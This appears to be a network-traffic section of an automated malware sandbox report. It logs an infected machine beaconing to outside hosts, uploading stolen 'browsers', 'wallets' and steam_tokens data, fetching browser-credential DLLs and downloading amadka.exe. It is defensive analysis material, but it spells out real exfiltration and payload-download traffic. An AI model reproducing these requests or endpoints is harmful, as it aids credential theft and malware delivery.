Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIIDAEBGCAAECAKFHIIHost: 85.28.47.4Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 49 49 44 41 45 42 47 43 41 41 45 43 41 4b 46 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 39 39 39 38 39 45 42 33 37 39 33 39 39 34 38 38 30 37 35 33 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 49 44 41 45 42 47 43 41 41 45 43 41 4b 46 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 49 44 41 45 42 47 43 41 41 45 43 41 4b 46 48 49 49 2d 2d 0d 0a Data Ascii: ------BGIIDAEBGCAAECAKFHIIContent-Disposition: form-data; name="hwid"9799989EB3793994880753------BGIIDAEBGCAAECAKFHIIContent-Disposition: form-data; name="build"default------BGIIDAEBGCAAECAKFHII--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBAKJKJJJECFIEBFHIEGHost: 85.28.47.4Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 41 4b 4a 4b 4a 4a 4a 45 43 46 49 45 42 46 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 63 61 31 66 35 37 35 62 39 31 36 65 30 65 36 66 30 38 35 37 30 63 33 37 31 65 36 30 35 38 63 61 66 62 37 30 64 32 31 36 64 63 33 32 65 64 39 65 65 36 34 35 62 37 61 32 32 62 65 31 36 36 32 30 39 35 35 34 66 35 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 4a 4b 4a 4a 4a 45 43 46 49 45 42 46 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 4a 4b 4a 4a 4a 45 43 46 49 45 42 46 48 49 45 47 2d 2d 0d 0a Data Ascii: ------CBAKJKJJJECFIEBFHIEGContent-Disposition: form-data; name="token"47ca1f575b916e0e6f08570c371e6058cafb70d216dc32ed9ee645b7a22be166209554f5------CBAKJKJJJECFIEBFHIEGContent-Disposition: form-data; name="message"browsers------CBAKJKJJJECFIEBFHIEG--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDGHDGIDAKEBAAKFCGHCHost: 85.28.47.4Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 47 48 44 47 49 44 41 4b 45 42 41 41 4b 46 43 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 63 61 31 66 35 37 35 62 39 31 36 65 30 65 36 66 30 38 35 37 30 63 33 37 31 65 36 30 35 38 63 61 66 62 37 30 64 32 31 36 64 63 33 32 65 64 39 65 65 36 34 35 62 37 61 32 32 62 65 31 36 36 32 30 39 35 35 34 66 35 0d 0a 2d 2d 2d 2d 2d 2d 49 44 47 48 44 47 49 44 41 4b 45 42 41 41 4b 46 43 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 44 47 48 44 47 49 44 41 4b 45 42 41 41 4b 46 43 47 48 43 2d 2d 0d 0a Data Ascii: ------IDGHDGIDAKEBAAKFCGHCContent-Disposition: form-data; name="token"47ca1f575b916e0e6f08570c371e6058cafb70d216dc32ed9ee645b7a22be166209554f5------IDGHDGIDAKEBAAKFCGHCContent-Disposition: form-data; name="message"plugins------IDGHDGIDAKEBAAKFCGHC--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBGDHDAECBGDHJKFIDGHost: 85.28.47.4Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 63 61 31 66 35 37 35 62 39 31 36 65 30 65 36 66 30 38 35 37 30 63 33 37 31 65 36 30 35 38 63 61 66 62 37 30 64 32 31 36 64 63 33 32 65 64 39 65 65 36 34 35 62 37 61 32 32 62 65 31 36 36 32 30 39 35 35 34 66 35 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 47 2d 2d 0d 0a Data Ascii: ------HDBGDHDAECBGDHJKFIDGContent-Disposition: form-data; name="token"47ca1f575b916e0e6f08570c371e6058cafb70d216dc32ed9ee645b7a22be166209554f5------HDBGDHDAECBGDHJKFIDGContent-Disposition: form-data; name="message"fplugins------HDBGDHDAECBGDHJKFIDG--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCFBFHIEBKJKFHIEBFBAHost: 85.28.47.4Content-Length: 6983Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/sqlite3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDGIIJJECFIDHJJKKFCHost: 85.28.47.4Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECFIEGDBKJKFIDHIECGHost: 85.28.47.4Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGDBKFBAKFBFHIECFBFIHost: 85.28.47.4Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 63 61 31 66 35 37 35 62 39 31 36 65 30 65 36 66 30 38 35 37 30 63 33 37 31 65 36 30 35 38 63 61 66 62 37 30 64 32 31 36 64 63 33 32 65 64 39 65 65 36 34 35 62 37 61 32 32 62 65 31 36 36 32 30 39 35 35 34 66 35 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 2d 2d 0d 0a Data Ascii: ------DGDBKFBAKFBFHIECFBFIContent-Disposition: form-data; name="token"47ca1f575b916e0e6f08570c371e6058cafb70d216dc32ed9ee645b7a22be166209554f5------DGDBKFBAKFBFHIECFBFIContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------DGDBKFBAKFBFHIECFBFIContent-Disposition: form-data; name="file"------DGDBKFBAKFBFHIECFBFI--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJDBAKKKFBFHIDGIIEHHost: 85.28.47.4Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 44 42 41 4b 4b 4b 46 42 46 48 49 44 47 49 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 63 61 31 66 35 37 35 62 39 31 36 65 30 65 36 66 30 38 35 37 30 63 33 37 31 65 36 30 35 38 63 61 66 62 37 30 64 32 31 36 64 63 33 32 65 64 39 65 65 36 34 35 62 37 61 32 32 62 65 31 36 36 32 30 39 35 35 34 66 35 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 44 42 41 4b 4b 4b 46 42 46 48 49 44 47 49 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 44 42 41 4b 4b 4b 46 42 46 48 49 44 47 49 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 44 42 41 4b 4b 4b 46 42 46 48 49 44 47 49 49 45 48 2d 2d 0d 0a Data Ascii: ------IIJDBAKKKFBFHIDGIIEHContent-Disposition: form-data; name="token"47ca1f575b916e0e6f08570c371e6058cafb70d216dc32ed9ee645b7a22be166209554f5------IIJDBAKKKFBFHIDGIIEHContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------IIJDBAKKKFBFHIDGIIEHContent-Disposition: form-data; name="file"------IIJDBAKKKFBFHIDGIIEH--
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/freebl3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/mozglue.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/msvcp140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/nss3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/softokn3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/vcruntime140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAFBFCBGHDGCFHJJECAFHost: 85.28.47.4Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKFHCFBGIIJKFHJDHDHHost: 85.28.47.4Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 43 46 42 47 49 49 4a 4b 46 48 4a 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 63 61 31 66 35 37 35 62 39 31 36 65 30 65 36 66 30 38 35 37 30 63 33 37 31 65 36 30 35 38 63 61 66 62 37 30 64 32 31 36 64 63 33 32 65 64 39 65 65 36 34 35 62 37 61 32 32 62 65 31 36 36 32 30 39 35 35 34 66 35 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 43 46 42 47 49 49 4a 4b 46 48 4a 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 43 46 42 47 49 49 4a 4b 46 48 4a 44 48 44 48 2d 2d 0d 0a Data Ascii: ------DBKFHCFBGIIJKFHJDHDHContent-Disposition: form-data; name="token"47ca1f575b916e0e6f08570c371e6058cafb70d216dc32ed9ee645b7a22be166209554f5------DBKFHCFBGIIJKFHJDHDHContent-Disposition: form-data; name="message"wallets------DBKFHCFBGIIJKFHJDHDH--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFHCGCGDAAKFIECFHDBHost: 85.28.47.4Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 46 48 43 47 43 47 44 41 41 4b 46 49 45 43 46 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 63 61 31 66 35 37 35 62 39 31 36 65 30 65 36 66 30 38 35 37 30 63 33 37 31 65 36 30 35 38 63 61 66 62 37 30 64 32 31 36 64 63 33 32 65 64 39 65 65 36 34 35 62 37 61 32 32 62 65 31 36 36 32 30 39 35 35 34 66 35 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 48 43 47 43 47 44 41 41 4b 46 49 45 43 46 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 48 43 47 43 47 44 41 41 4b 46 49 45 43 46 48 44 42 2d 2d 0d 0a Data Ascii: ------DBFHCGCGDAAKFIECFHDBContent-Disposition: form-data; name="token"47ca1f575b916e0e6f08570c371e6058cafb70d216dc32ed9ee645b7a22be166209554f5------DBFHCGCGDAAKFIECFHDBContent-Disposition: form-data; name="message"files------DBFHCGCGDAAKFIECFHDB--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBGIEGCFHCFHIDHIJECAHost: 85.28.47.4Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 63 61 31 66 35 37 35 62 39 31 36 65 30 65 36 66 30 38 35 37 30 63 33 37 31 65 36 30 35 38 63 61 66 62 37 30 64 32 31 36 64 63 33 32 65 64 39 65 65 36 34 35 62 37 61 32 32 62 65 31 36 36 32 30 39 35 35 34 66 35 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 41 2d 2d 0d 0a Data Ascii: ------EBGIEGCFHCFHIDHIJECAContent-Disposition: form-data; name="token"47ca1f575b916e0e6f08570c371e6058cafb70d216dc32ed9ee645b7a22be166209554f5------EBGIEGCFHCFHIDHIJECAContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------EBGIEGCFHCFHIDHIJECAContent-Disposition: form-data; name="file"------EBGIEGCFHCFHIDHIJECA--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDAKFIJJKJJJKEBKJEHHost: 85.28.47.4Content-Length: 270Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 63 61 31 66 35 37 35 62 39 31 36 65 30 65 36 66 30 38 35 37 30 63 33 37 31 65 36 30 35 38 63 61 66 62 37 30 64 32 31 36 64 63 33 32 65 64 39 65 65 36 34 35 62 37 61 32 32 62 65 31 36 36 32 30 39 35 35 34 66 35 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 48 2d 2d 0d 0a Data Ascii: ------HIDAKFIJJKJJJKEBKJEHContent-Disposition: form-data; name="token"47ca1f575b916e0e6f08570c371e6058cafb70d216dc32ed9ee645b7a22be166209554f5------HIDAKFIJJKJJJKEBKJEHContent-Disposition: form-data; name="message"jbdtaijovg------HIDAKFIJJKJJJKEBKJEH--
Source: global traffic HTTP traffic detected: GET /mine/amadka.exe HTTP/1.1Host: 77.91.77.81Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 37 32 38 37 36 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB72876B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 37 32 38 37 36 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB72876B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 37 32 38 37 36 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB72876B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 37 32 38 37 36 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB72876B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 37 32 38 37 36 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB72876B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 37 32 38 37 36 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB72876B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 37 32 38 37 36 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: 